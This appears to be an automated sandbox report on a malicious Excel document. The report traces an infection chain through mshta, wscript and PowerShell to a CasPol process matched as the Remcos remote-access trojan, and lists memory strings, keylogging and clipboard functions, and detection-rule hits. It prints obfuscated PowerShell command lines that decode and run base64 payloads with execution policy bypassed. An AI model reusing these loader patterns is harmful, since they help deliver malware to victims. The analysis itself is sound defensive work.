                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.473316971.000000001A77B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheIi
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: CasPol.exe, 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C45C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.505629322.000000001C211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 29_2_0041183A OpenClipboard,GetLastError,DeleteFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 29_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 29_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 30_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 30_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 31_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 31_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
Source: Yara match | File source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match File source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_0041BB77 SystemParametersInfoW

                  System Summary

                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0200011080.xls OLE: Microsoft Excel 2007+
                  Source: CC430000.0.dr OLE: Microsoft Excel 2007+
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE89A934CE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE89A96FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 29_2_0044D6C0
